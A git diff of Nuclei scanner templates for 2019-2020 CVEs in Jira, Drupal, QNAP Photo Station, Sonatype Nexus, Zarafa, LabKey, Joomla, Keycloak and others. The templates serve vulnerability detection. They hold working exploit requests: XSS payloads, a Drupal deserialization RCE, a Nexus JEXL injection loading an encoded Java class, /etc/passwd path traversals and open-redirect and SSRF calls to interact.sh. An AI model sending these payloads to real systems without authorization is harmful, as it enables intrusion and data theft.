cve,cve2019,atlassian,jira,xss -requests: - - method: GET - path: - - "{{BaseURL}}//secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "" - part: body diff --git a/nuclei-templates/CVE-2019/cve-2019-3912.yaml b/nuclei-templates/CVE-2019/cve-2019-3912.yaml new file mode 100644 index 0000000000..7e2dd681ab --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-3912.yaml @@ -0,0 +1,43 @@ +id: CVE-2019-3912 + +info: + name: LabKey Server Community Edition <18.3.0 - Open Redirect + author: 0x_Akoko + severity: medium + description: LabKey Server Community Edition before 18.3.0-61806.763 contains an open redirect vulnerability via the /__r1/ returnURL parameter, which allows an attacker to redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. + remediation: | + Upgrade LabKey Server Community Edition to version 18.3.0 or later to mitigate the vulnerability. + reference: + - https://www.tenable.com/security/research/tra-2019-03 + - https://nvd.nist.gov/vuln/detail/CVE-2019-3912 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/StarCrossPortal/scalpel + - https://github.com/anonymous364872/Rapier_Tool + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-3912 + cwe-id: CWE-601 + epss-score: 0.0016 + epss-percentile: 0.51564 + cpe: cpe:2.3:a:labkey:labkey_server:*:*:*:*:community:*:*:* + metadata: + max-request: 1 + vendor: labkey + product: labkey_server + shodan-query: 'Server: Labkey' + tags: cve2019,cve,tenable,redirect,labkey + +http: + - method: GET + path: + - '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a0047304502202facf9c390592bc28c4dac04cc1ee7e777ee2b9f47a1a52f34c28c22ea5dcc44022100eefac30fb0357569c6e6b9aedc343ad494f6fcad92bc166f018d57794331bcc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-6340.yaml b/nuclei-templates/CVE-2019/cve-2019-6340.yaml index 58c095ae55..c7691882b1 100644 --- a/nuclei-templates/CVE-2019/cve-2019-6340.yaml +++ b/nuclei-templates/CVE-2019/cve-2019-6340.yaml @@ -1,22 +1,44 @@ -id: cve-2019-6340 +id: CVE-2019-6340 + info: name: Drupal 8 core RESTful Web Services RCE author: madrobot - severity: critical + severity: high description: Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases. reference: https://nvd.nist.gov/vuln/detail/CVE-2019-6340 tags: cve,cve2019,drupal,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2019-6340 + cwe-id: CWE-502 + requests: - method: POST path: - '{{BaseURL}}/node/1?_format=hal_json' - body: '{ "link": [ { "value": "link", "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" } ], "_links": { "type": { "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default" } } }' + + body: '{ + "link": [ + { + "value": "link", + "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" + } + ], + "_links": { + "type": { + "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default" + } + } +}' + matchers-condition: and matchers: - type: word words: - "uid=" - "gid=" + - "groups=" condition: and part: body - type: status diff --git a/nuclei-templates/CVE-2019/cve-2019-7192.yaml b/nuclei-templates/CVE-2019/cve-2019-7192.yaml index 8aa8658ac1..54e5da5d21 100644 --- a/nuclei-templates/CVE-2019/cve-2019-7192.yaml +++ b/nuclei-templates/CVE-2019/cve-2019-7192.yaml @@ -1,21 +1,87 @@ id: CVE-2019-7192 info: - name: QNAP Photo Station RCE - author: medbsq - severity: medium - - #https://www.cvebase.com/cve/2019/7192 -requests: - - method: GET - path: - - "{{BaseURL}}/photo/p/api/video.php" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + name: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution + author: DhiyaneshDK + severity: critical + description: | + This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of QNAP QTS and Photo Station. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-7192 + - https://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html + - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability + - https://nvd.nist.gov/vuln/detail/CVE-2022-2546 + - https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-7192 + cwe-id: CWE-863 + epss-score: 0.96341 + epss-percentile: 0.99518 + cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: qnap + product: photo_station + shodan-query: 'Content-Length: 580 "http server 1.0"' + tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss + +http: + - raw: + - | + POST /photo/p/api/album.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + a=setSlideshow&f=qsamplealbum + - | + GET /photo/slideshow.php?album={{album_id}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + - | + POST /photo/p/api/video.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd + + matchers-condition: and matchers: + - type: regex + part: body_3 + regex: + - "admin:.*:0:0:" + + - type: word + part: header_3 + words: + - video/subtitle + - type: status + part: header_3 status: - - 401 + - 200 + extractors: + - type: regex + name: album_id + part: body_1 + group: 1 + regex: + - '([a-zA-Z]+)<\/output>' + internal: true - \ No newline at end of file + - type: regex + name: access_code + part: body_2 + group: 1 + regex: + - encodeURIComponent\('([A-Za-z0-9]+)'\) + internal: true +# digest: 490a00463044022038d4a2748704935b1e8bc5116823f31085bcbf7ea7e50794a573a764ae591c9302205bad9bbdd999c6e5f0f33dd0b4fe2e294705d0497bec580f6ecbad2993041d87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-7219.yaml b/nuclei-templates/CVE-2019/cve-2019-7219.yaml new file mode 100644 index 0000000000..076926d4d7 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-7219.yaml @@ -0,0 +1,37 @@ +id: CVE-2019-7219 + +info: + name: Zarafa WebApp Reflected XSS + author: pdteam + severity: medium + description: | + Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead. + reference: + - https://github.com/verifysecurity/CVE-2019-7219 + - https://stash.kopano.io/repos?visibility=public + tags: cve,cve2019,zarafa,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-7219 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-7238.yaml b/nuclei-templates/CVE-2019/cve-2019-7238.yaml new file mode 100644 index 0000000000..e6d8c9427e --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-7238.yaml @@ -0,0 +1,37 @@ +id: CVE-2019-7238 + +info: + name: NEXUS < 3.14.0 Remote Code Execution + author: pikpikcu + severity: critical + tags: cve,cve2019,nexus,rce + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 + - https://github.com/jas502n/CVE-2019-7238 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-7238 + description: "Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control." + +requests: + - raw: + - | + POST /service/extdirect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + X-Requested-With: XMLHttpRequest + + {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"} + + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-7275.yaml b/nuclei-templates/CVE-2019/cve-2019-7275.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-7275.yaml rename to nuclei-templates/CVE-2019/cve-2019-7275.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-8449.yaml b/nuclei-templates/CVE-2019/cve-2019-8449.yaml new file mode 100644 index 0000000000..5ae0e70a6c --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-8449.yaml @@ -0,0 +1,30 @@ +id: CVE-2019-8449 + +info: + name: JIRA Unauthenticated Sensitive Information Disclosure + author: harshbothra_ + severity: medium + description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. + reference: + - https://www.doyler.net/security-not-included/more-jira-enumeration + - https://jira.atlassian.com/browse/JRASERVER-69796 + tags: cve,cve2019,atlassian,jira,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-8449 + cwe-id: CWE-306 + +requests: + - method: GET + path: + - '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '{"users":{"users":' + part: body diff --git a/nuclei-templates/CVE-2019/CVE-2019-9726.yaml b/nuclei-templates/CVE-2019/cve-2019-9726.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-9726.yaml rename to nuclei-templates/CVE-2019/cve-2019-9726.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-9915.yaml b/nuclei-templates/CVE-2019/cve-2019-9915.yaml deleted file mode 100644 index 0a46dc948d..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-9915.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2019-9915 - -info: - name: GetSimple CMS 3.3.13 - Open Redirect - author: 0x_Akoko - severity: medium - description: GetSimple CMS 3.3.13 contains an open redirect vulnerability via the admin/index.php redirect parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - reference: - - https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms - - https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300 - - https://www.cvedetails.com/cve/CVE-2019-9915 - - https://www.netsparker.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms/ - - https://nvd.nist.gov/vuln/detail/CVE-2019-9915 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-9915 - cwe-id: CWE-601 - metadata: - verified: "true" - tags: cve,cve2019,redirect,getsimple,cms - -requests: - - raw: - - | - POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - userid={{username}}&pwd={{password}}&submitted=Login - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by md on 2022/10/13 diff --git a/nuclei-templates/CVE-2019/cve-2019-9922.yaml b/nuclei-templates/CVE-2019/cve-2019-9922.yaml deleted file mode 100644 index c208b08749..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-9922.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2019-9922 - -info: - name: Joomla! Harmis Messenger 1.2.2 - Local File Inclusion - author: 0x_Akoko - severity: high - description: Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files. - reference: - - https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md - - https://www.cvedetails.com/cve/CVE-2019-9922 - - https://extensions.joomla.org/extension/je-messenger/ - - https://nvd.nist.gov/vuln/detail/CVE-2019-9922 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-9922 - cwe-id: CWE-22 - tags: cve,cve2019,joomla,messenger,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/13 diff --git a/nuclei-templates/CVE-2020/CVE-2020-10124.yaml b/nuclei-templates/CVE-2020/CVE-2020-10124.yaml index a8142579c3..065a434919 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-10124.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-10124.yaml @@ -1,5 +1,4 @@ id: CVE-2020-10124 - info: name: SolarWindsOrion LFI author: medbsq @@ -29,4 +28,4 @@ requests: part: header - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-10220.yaml b/nuclei-templates/CVE-2020/CVE-2020-10220.yaml deleted file mode 100644 index e9810fe476..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-10220.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: CVE-2020-10220 -info: - name: rConfig SQLi - author: medbsq - severity: high -# https://www.cvebase.com/cve/2020/10220 -requests: - - method: GET - path: - - "{{BaseURL}}/login.php" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - matchers-condition: and - matchers: - - type: word - words: - - "rConfig Version 3.9" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-10546.yaml b/nuclei-templates/CVE-2020/CVE-2020-10546.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-10546.yaml rename to nuclei-templates/CVE-2020/CVE-2020-10546.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-10547.yaml b/nuclei-templates/CVE-2020/CVE-2020-10547.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-10547.yaml rename to nuclei-templates/CVE-2020/CVE-2020-10547.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-10770.yaml b/nuclei-templates/CVE-2020/CVE-2020-10770.yaml deleted file mode 100644 index d0659c865b..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-10770.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2020-10770 -info: - name: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated) - author: dhiyaneshDk - severity: medium - description: A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack. - reference: - - https://packetstormsecurity.com/files/164499/Keycloak-12.0.1-Server-Side-Request-Forgery.html - - https://www.exploit-db.com/exploits/50405 - - https://nvd.nist.gov/vuln/detail/CVE-2020-10770 - - https://bugzilla.redhat.com/show_bug.cgi?id=1846270 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N - cvss-score: 5.3 - cve-id: CVE-2020-10770 - cwe-id: CWE-601 - tags: keycloak,ssrf,oast,cve,cve2020,blind -requests: - - method: GET - path: - - '{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/' - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2020/CVE-2020-10973.yaml b/nuclei-templates/CVE-2020/CVE-2020-10973.yaml index f1d09232e0..90cab3e5d6 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-10973.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-10973.yaml @@ -6,21 +6,33 @@ info: severity: high description: | Wavlink WN530HG4, WN531G3, WN533A8, and WN551K are susceptible to improper access control via /cgi-bin/ExportAllSettings.sh, where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or control of the affected device. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://github.com/sudo-jtcsec/CVE/blob/master/CVE-2020-10973 - https://github.com/sudo-jtcsec/Nyra - https://nvd.nist.gov/vuln/detail/CVE-2020-10973 + - https://github.com/Roni-Carta/nyra + - https://github.com/sudo-jtcsec/CVE/blob/master/CVE-2020-10973-affected_devices classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-10973 cwe-id: CWE-306 + epss-score: 0.02524 + epss-percentile: 0.8991 + cpe: cpe:2.3:o:wavlink:wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn530hg4_firmware shodan-query: http.html:"Wavlink" - verified: "true" tags: cve,cve2020,exposure,wavlink -requests: +http: - raw: - | GET /backupsettings.dat HTTP/1.1 @@ -41,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/01 +# digest: 4a0a00473045022100f6af203eafa61520f456e34431ad08278be23262ed4ae0d76c6cfcd5179ae2e202205845c8a2ee3e08dbc47c76decf7fb3355c00c23d0ffb7a81cf87d4cbb19303ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-11110.yaml b/nuclei-templates/CVE-2020/CVE-2020-11110.yaml index 99910d37ea..da0bf70b6c 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-11110.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-11110.yaml @@ -1,23 +1,19 @@ id: CVE-2020-11110 info: - name: Grafana Unauthenticated Stored XSS author: emadshanab severity: medium + name: Grafana Unauthenticated Stored XSS description: Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot. + tags: cve,cve2020,xss,grafana reference: - - https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html + - https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html - https://nvd.nist.gov/vuln/detail/CVE-2020-11110 - - https://github.com/grafana/grafana/blob/master/CHANGELOG.md - - https://security.netapp.com/advisory/ntap-20200810-0002/ - remediation: This issue can be resolved by updating Grafana to the latest version. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2020-11110 cwe-id: CWE-79 - tags: cve,cve2020,xss,grafana - requests: - raw: - | diff --git a/nuclei-templates/CVE-2020/CVE-2020-11450.yaml b/nuclei-templates/CVE-2020/CVE-2020-11450.yaml index edeb71dc40..25dae9851f 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-11450.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-11450.yaml @@ -6,25 +6,36 @@ info: severity: high description: | MicroStrategy Web 10.4 is susceptible to information disclosure. The JVM configuration, CPU architecture, installation folder, and other information are exposed through /MicroStrategyWS/happyaxis.jsp. An attacker can use this vulnerability to learn more about the application environment and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information. + remediation: Mitigated in all versions 11.0 and higher. reference: - http://packetstormsecurity.com/files/157068/MicroStrategy-Intelligence-Server-And-Web-10.4-XSS-Disclosure-SSRF-Code-Execution.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11450 - 